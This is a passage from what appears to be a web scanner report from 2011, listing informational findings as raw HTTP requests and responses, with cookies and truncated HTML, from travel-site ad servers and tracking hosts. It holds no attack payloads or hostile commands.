Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:59 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:37:59 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1277
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...
27.27. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1056
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125326&AdID=181467&TargetID=31993&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,9520,10495,11148,12670,20052,20299,20311,21304,22041,22251,2
...[SNIP]...
27.28. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=3081322;type=flood471;cat=hublo997;ord=2512447414919.734? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hublot.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 02 Oct 2011 23:59:02 GMT
Expires: Sun, 02 Oct 2011 23:59:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 194
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>
27.29. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=425A3F0D7D8F379F923F9D8944F00D2B; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:20 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
27.30. http://hublotnation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /

Request

GET /?xd_receiver=1 HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=0&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Mon, 26 Sep 2011 00:04:49 GMT
Last-Modified: Mon, 03 Oct 2011 00:04:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 318
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script
...[SNIP]...
27.31. http://hublotnation.com/wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

Request

GET /wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
x-requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 455
Content-Type: text/html

<!-- socials postings -->
<dl id="socials-postings">
   <dt><label for="post-to-facebook">Post to my facebook</label><input type="checkbox" id="post-to-facebook" /></dt>
   <dt><label for="post-to-twitter
...[SNIP]...
27.32. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40®ION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40&REGION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40&REGION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.3.4038.33275 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40&REGION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807
...[SNIP]...
27.33. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=760f623e-aac2-41c7-afce-35fce14d824d&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=760f623e-aac2-41c7-afce-35fce14d824d&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=760f623e-aac2-41c7-afce-35fce14d824d&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A196.1.0%3A92.0.0.i1%3A121.503.0.i7%3A195.0.0%3A104.0.1%7CHCOM_US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.3.4038.33275 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE&tile=76
...[SNIP]...
27.34. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=RCoxODUuMC4wLmkxJTNBMTE0LjEuMCUzQTEyNC4xLjAuaTElM0ExMDMuNC4xLmk2JTNBMTcxLjEuMCUzQTEzMC4xLjEuaTIlM0E0OC4xLjAlM0E5Ny43My4xLmkzJTNBOTguNi40JTNBMTQyLjAuMC5pNCUzQTE5OC4yLjAlM0ExNDUuMC4wLmkyJTNBMjAwLjAuMCUzQTEzNy4wLjAuaTIlM0ExMDguMS4wLmkyJTNBMTkwLjMuMCUzQTE1Mi4wLjAuaTIlM0ExMzQuMC4xJTNBMTk2LjEuMCUzQTIuMi4xJTNBMjA5LjAuMSUzQTE0Ny42LjAuaTYlM0E5Mi4wLjAuaTElM0ExMjEuNTAzLjAuaTclM0ExMzIuMi4wLmkyJTNBMTIyLjEuMC5pMyUzQTEzOC4xLjAlM0ExNDkuMC4wLmkxJTNBMTA0LjAuMSUzQTE5NS4wLjAlN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:35 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe004:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:02:35 GMT
Pragma: no-cache
Content-Length: 1275
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYS
...[SNIP]...
27.35. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; 